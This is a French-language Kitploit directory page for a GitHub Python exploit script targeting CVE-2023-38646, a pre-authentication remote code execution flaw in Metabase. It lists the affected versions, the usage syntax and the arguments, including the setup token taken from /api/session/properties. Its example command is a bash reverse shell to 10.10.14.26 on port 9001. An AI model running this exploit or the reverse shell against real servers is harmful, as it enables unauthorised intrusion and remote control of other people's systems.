Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-38646 — Script d'exploitation pour RCE avant authentification dans Metabase (CVE-2023-38646) | Kitploit
Outils/GitHubGitHub/pyr0sec/cve-2023-38646
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubpyr0sec/cve-2023-38646

CVE-2023-38646

Script d'exploitation pour RCE avant authentification dans Metabase (CVE-2023-38646)

Voir le dépôt
112il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC de RCE Pré-Authentification Metabase (CVE-2023-38646)

Ceci est un script Python qui exploite la vulnérabilité d'exécution de code à distance du logiciel de connexion de Metabase. Il permet d'exécuter des commandes arbitraires sur le serveur avant l'authentification.

Les versions vulnérables sont Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1

Usage

root@kitploit:~
python3 exploit.py -u URL -t TOKEN -c COMMAND

Arguments

root@kitploit:~
-h, --help            show this help message and exit
-u URL, --url URL     URL cible
-t TOKEN, --token TOKEN
                      Jeton d'installation trouvé dans /api/session/properties
-c COMMAND, --command COMMAND
                      Commande à exécuter sur l'hôte cible

Example

image

Commande utilisée : bash -i >& /dev/tcp/10.10.14.26/9001 0>&1

Références

Enchaîner vers une RCE Pré-Authentification dans Metabase (CVE-2023-38646)

Télécharger l’outil